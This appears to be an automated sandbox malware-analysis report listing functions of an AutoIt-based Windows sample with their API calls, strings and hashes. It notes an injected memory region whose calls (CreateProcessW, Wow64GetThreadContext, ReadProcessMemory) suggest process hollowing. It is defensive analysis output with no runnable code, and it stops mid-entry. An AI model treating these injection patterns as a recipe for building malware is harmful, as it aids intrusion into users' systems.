                                                            • Opcode ID: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                                            • Instruction ID: 9c7e31e6fb6427a597b1ee83357aa1a0675f36c6cccb1ed5fc31666abf82cbb9
                                                            • Opcode Fuzzy Hash: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
                                                            • Instruction Fuzzy Hash: C7A10674E00209EBDB14CFA8C894BEEBBB5BF48B08F20815DE615BB281D7759E41CB54

                                                            Control-flow Graph

                                                             • Graph (interactive, not reproduced): single basic block cd39d5-cd3a45 calling CreateWindowExW twice and ShowWindow twice
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00CD3A03
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00CD3A24
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00CD3A38
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00CD3A41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: 576909e8ad3722796d254c7bb7d100f7a1fdf87abc3a53bb353c2c9c0b58901c
                                                            • Instruction ID: 73f6aaf473f5b6301f37371987411a47d718d00a381607026b79ea068beac5b4
                                                            • Opcode Fuzzy Hash: 576909e8ad3722796d254c7bb7d100f7a1fdf87abc3a53bb353c2c9c0b58901c
                                                            • Instruction Fuzzy Hash: 09F03A705007907EEA3257237C08E2B2E7DD7CAF51B00003ABD00E73B4C2621800CBB4

                                                            Control-flow Graph

                                                             • Graph (interactive, not reproduced): basic blocks 13c23b0-13c2607; every failure edge (CreateFileW, VirtualAlloc, ReadFile) goes to the exit block at 13c2602, while the success path runs through 13c22e0 and 13c12a0 into ExitProcess at 13c25f8
                                                             • API calls in the graph: CreateFileW, VirtualAlloc, ReadFile, ExitProcess
                                                             • Internal calls: 13c0000, 13c22a0, 13c22e0, 13c12a0, 13c2330
                                                            APIs
                                                              • Part of subcall function 013C22A0: Sleep.KERNELBASE(000001F4), ref: 013C22B1
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013C2538
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396799655.00000000013C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_13c0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: GNTC9NGO4FALP278BMJLS25L02
                                                            • API String ID: 2694422964-939167856
                                                            • Opcode ID: 8258f348df83242f8894cf1a90b4e04cb20e990173444d63a332fff95989b78c
                                                            • Instruction ID: f61540f13909618e6b1bebc9158cf2ab5b8b821fc2457a6356dceaf2a28bee56
                                                            • Opcode Fuzzy Hash: 8258f348df83242f8894cf1a90b4e04cb20e990173444d63a332fff95989b78c
                                                            • Instruction Fuzzy Hash: C1718270D14289DAEB11DBA4C854BEFBB75AF15704F004099E248BB2C0D7BA0F45CB6A

                                                            Control-flow Graph: function cd407c-cd4173 (graph rendering omitted; its blocks call LoadStringW and Shell_NotifyIconW)
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D0D3D7
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            • _memset.LIBCMT ref: 00CD40FC
                                                            • _wcscpy.LIBCMT ref: 00CD4150
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00CD4160
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3942752672-1585850449
                                                            • Opcode ID: 2721d5be864ff6490c1c536413ecb4f4cb2cc4b4b0022ce6f9fa18eaf9dbcd14
                                                            • Instruction ID: 573775eba4ea051c67b8cde821848c746b4bf1261b25b1c83ecaa8994c100654
                                                            • Opcode Fuzzy Hash: 2721d5be864ff6490c1c536413ecb4f4cb2cc4b4b0022ce6f9fa18eaf9dbcd14
                                                            • Instruction Fuzzy Hash: 4031AF71008705AFD725EB60EC46FEB77D8AF44300F10462FF789922A1EB70A648D7A6

                                                            Control-flow Graph: function starting at cd686a (graph rendering omitted; blocks consist of internal calls only)
                                                            APIs
                                                              • Part of subcall function 00CD4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00D952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00CD4E0F
                                                            • _free.LIBCMT ref: 00D0E263
                                                            • _free.LIBCMT ref: 00D0E2AA
                                                              • Part of subcall function 00CD6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00CD6BAD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                            • API String ID: 2861923089-1757145024
                                                            • Opcode ID: ab0dd85a22152d96df88c616b7ec1b833fce4aeed40121bac44edd5a4a8c4f5b
                                                            • Instruction ID: 2c74ade1fa47be5598d1e5f3101d9913bded03eb1170c4cdc43d67e1697f1ca6
                                                            • Opcode Fuzzy Hash: ab0dd85a22152d96df88c616b7ec1b833fce4aeed40121bac44edd5a4a8c4f5b
                                                            • Instruction Fuzzy Hash: 4F918071900219EFCF14EFA4CC919EDB7B9FF14310F14482AF959AB2A1DB70A905DB60
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00CD35A1,SwapMouseButtons,00000004,?), ref: 00CD35D4
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00CD35A1,SwapMouseButtons,00000004,?,?,?,?,00CD2754), ref: 00CD35F5
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,00CD35A1,SwapMouseButtons,00000004,?,?,?,?,00CD2754), ref: 00CD3617
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: bce5fb2f38d224ee41803f51683421db3004e16e4f424450d3890483ef0558dc
                                                            • Instruction ID: 402ff0d180f0c4cc3c2b8386d68ebfd887dc94ec724b347696417eabcca2755f
                                                            • Opcode Fuzzy Hash: bce5fb2f38d224ee41803f51683421db3004e16e4f424450d3890483ef0558dc
                                                            • Instruction Fuzzy Hash: C1113675510248BADB208F68DC40EEBB7A8EF04740F00446AB905DB310D2719F419765
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 013C1A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013C1AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013C1B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396799655.00000000013C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_13c0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: fc8f1a43d92b409a9fc3443f05f08a35b7dbde12cca23af92c4c83ca62f6b31d
                                                            • Instruction ID: 10ca7e56f18a9261f102899ddabaff2c851a53057e21a6400275d8ee5fbece55
                                                            • Opcode Fuzzy Hash: fc8f1a43d92b409a9fc3443f05f08a35b7dbde12cca23af92c4c83ca62f6b31d
                                                            • Instruction Fuzzy Hash: 20623B30A14218DBEB24DFA4C840BEEB376EF58704F1091A9D20DEB391E7759E81CB59
                                                            APIs
                                                              • Part of subcall function 00CD4EE5: _fseek.LIBCMT ref: 00CD4EFD
                                                              • Part of subcall function 00D39734: _wcscmp.LIBCMT ref: 00D39824
                                                              • Part of subcall function 00D39734: _wcscmp.LIBCMT ref: 00D39837
                                                            • _free.LIBCMT ref: 00D396A2
                                                            • _free.LIBCMT ref: 00D396A9
                                                            • _free.LIBCMT ref: 00D39714
                                                              • Part of subcall function 00CF2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00CF9A24), ref: 00CF2D69
                                                              • Part of subcall function 00CF2D55: GetLastError.KERNEL32(00000000,?,00CF9A24), ref: 00CF2D7B
                                                            • _free.LIBCMT ref: 00D3971C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                            • String ID:
                                                            • API String ID: 1552873950-0
                                                            • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                            • Instruction ID: 27f95c5cedfbf805ba5563cc34d73a0373348ea4c1bcd0a5e2648dcaf2f12d44
                                                            • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                            • Instruction Fuzzy Hash: 5E514FB1D04258AFDF249FA4CC85AAEBB79EF48300F10449EF649A3351DB715A80DF69
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction ID: 8ad246a2a4455f5cb4c4a278790309ba33e78bb2694b2cfc09ee81d2f7a48ebf
                                                            • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction Fuzzy Hash: 8741D974A0074D9BDB5CDE69C8809BF7BA6EF41364B24813EE625C7680D770DE41CB42
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D0EA39
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00D0EA83
                                                              • Part of subcall function 00CD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CD4743,?,?,00CD37AE,?), ref: 00CD4770
                                                              • Part of subcall function 00CF0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00CF07B0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                            • String ID: X
                                                            • API String ID: 3777226403-3081909835
                                                            • Opcode ID: befce7fdccd679310b7f9548c14fc5099b5f03fee8b41e5c62a2277374f7aa98
                                                            • Instruction ID: 392f541795fe1a97be1985e03988566ef80ef73c25c1f09cddfc0f15df4b0bb7
                                                            • Opcode Fuzzy Hash: befce7fdccd679310b7f9548c14fc5099b5f03fee8b41e5c62a2277374f7aa98
                                                            • Instruction Fuzzy Hash: DD21D230A002889BCF51DF98DC45BEE7BF8AF48710F04405AE608EB381DBB45989DFA1
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00D398F8
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00D3990F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: 5f51ce2e9bf74347fc239184bb4c023b228cd2e5630575022c59899ee649e6d0
                                                            • Instruction ID: 9e491493783c5caa6f36f1cbc5346460da843c52eac1a07c4fd1d594b1cd182e
                                                            • Opcode Fuzzy Hash: 5f51ce2e9bf74347fc239184bb4c023b228cd2e5630575022c59899ee649e6d0
                                                            • Instruction Fuzzy Hash: 78D05BB554030D6BDB50AB90DC0DF96773CD704705F4002B1BE54D5191D97055589BA5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2255a64eb274ebb280606efbd923bbb64024f7590e4161a9c6d2bea4ebf0eb30
                                                            • Instruction ID: 3845ad83409b1f9d3e5937bbfc18d530874aad89e621248e19c1dbe41ed340ce
                                                            • Opcode Fuzzy Hash: 2255a64eb274ebb280606efbd923bbb64024f7590e4161a9c6d2bea4ebf0eb30
                                                            • Instruction Fuzzy Hash: E4F14875A083419FCB54DF28C480A6ABBE5FF88314F14892EF9999B351D730E945CFA2
                                                            APIs
                                                              • Part of subcall function 00CF0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00CF0193
                                                              • Part of subcall function 00CF0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00CF019B
                                                              • Part of subcall function 00CF0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00CF01A6
                                                              • Part of subcall function 00CF0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00CF01B1
                                                              • Part of subcall function 00CF0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00CF01B9
                                                              • Part of subcall function 00CF0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00CF01C1
                                                              • Part of subcall function 00CE60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00CDF930), ref: 00CE6154
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00CDF9CD
                                                            • OleInitialize.OLE32(00000000), ref: 00CDFA4A
                                                            • CloseHandle.KERNEL32(00000000), ref: 00D145C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID:
                                                            • API String ID: 1986988660-0
                                                            • Opcode ID: cc2620dba1fc6e8d72ad806ebfb6f78751c802bf0aa8492918bc3e060540ed47
                                                            • Instruction ID: f4ba1996f70491144c5973ed8e6b8772dcd2e8975bb2f8c9097788cff547257f
                                                            • Opcode Fuzzy Hash: cc2620dba1fc6e8d72ad806ebfb6f78751c802bf0aa8492918bc3e060540ed47
                                                            • Instruction Fuzzy Hash: 0D81C9B0901B40CFC7C6EF7AB8406197BE5EB89306750823BE509CB36AEB7045858F71
                                                            APIs
                                                            • _memset.LIBCMT ref: 00CD4370
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00CD4415
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00CD4432
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$_memset
                                                            • String ID:
                                                            • API String ID: 1505330794-0
                                                            • Opcode ID: ff63b8a01fca525031b0ad734f7ccd403b52399d0ceec003bf68055803800f9d
                                                            • Instruction ID: 10a2dad46f1791ef4b7268c8dd8f3584f59f0377f275aa01c126eaeefb31e8e6
                                                            • Opcode Fuzzy Hash: ff63b8a01fca525031b0ad734f7ccd403b52399d0ceec003bf68055803800f9d
                                                            • Instruction Fuzzy Hash: 89315EB05047019FD725EF24D88569BBBE8FB58309F00092FE79AC6351E771AA44CBA6
                                                            APIs
                                                            • __FF_MSGBANNER.LIBCMT ref: 00CF5733
                                                              • Part of subcall function 00CFA16B: __NMSG_WRITE.LIBCMT ref: 00CFA192
                                                              • Part of subcall function 00CFA16B: __NMSG_WRITE.LIBCMT ref: 00CFA19C
                                                            • __NMSG_WRITE.LIBCMT ref: 00CF573A
                                                              • Part of subcall function 00CFA1C8: GetModuleFileNameW.KERNEL32(00000000,00D933BA,00000104,?,00000001,00000000), ref: 00CFA25A
                                                              • Part of subcall function 00CFA1C8: ___crtMessageBoxW.LIBCMT ref: 00CFA308
                                                              • Part of subcall function 00CF309F: ___crtCorExitProcess.LIBCMT ref: 00CF30A5
                                                              • Part of subcall function 00CF309F: ExitProcess.KERNEL32 ref: 00CF30AE
                                                              • Part of subcall function 00CF8B28: __getptd_noexit.LIBCMT ref: 00CF8B28
                                                            • RtlAllocateHeap.NTDLL(013F0000,00000000,00000001,00000000,?,?,?,00CF0DD3,?), ref: 00CF575F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1372826849-0
                                                            • Opcode ID: 5f64412bfac4ff3371d9c5f8337de60856a5a1ee0e45d5b92fe2face979b0426
                                                            • Instruction ID: 3417162f2565d496c1c8b7ad11d2b846da55a6e8bee6fbf02d6c06bf32b1ac31
                                                            • Opcode Fuzzy Hash: 5f64412bfac4ff3371d9c5f8337de60856a5a1ee0e45d5b92fe2face979b0426
                                                            • Instruction Fuzzy Hash: 9601D275310B09EBD6953735EC42B3E63488B42362F110127F715DA291DE7099015663
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00D39548,?,?,?,?,?,00000004), ref: 00D398BB
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00D39548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00D398D1
                                                            • CloseHandle.KERNEL32(00000000,?,00D39548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00D398D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: 250e0e367161d36e9712866f0da58852d81e3c0c5408708ca9353d94215787c1
                                                            • Instruction ID: 075b23a9e307d28dac8cc67cc140670a87f24131e7986ee9bb9d636a2a104086
                                                            • Opcode Fuzzy Hash: 250e0e367161d36e9712866f0da58852d81e3c0c5408708ca9353d94215787c1
                                                            • Instruction Fuzzy Hash: A3E08632141714B7E7212B54EC09FCA7B19AB06761F144220FF14ED1E087B1251197A8
                                                            APIs
                                                            • _free.LIBCMT ref: 00D38D1B
                                                              • Part of subcall function 00CF2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00CF9A24), ref: 00CF2D69
                                                              • Part of subcall function 00CF2D55: GetLastError.KERNEL32(00000000,?,00CF9A24), ref: 00CF2D7B
                                                            • _free.LIBCMT ref: 00D38D2C
                                                            • _free.LIBCMT ref: 00D38D3E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                            • Instruction ID: f093cedb812a977fc282614ff4e215f94a94c782c12beb440da3b94ab76ce080
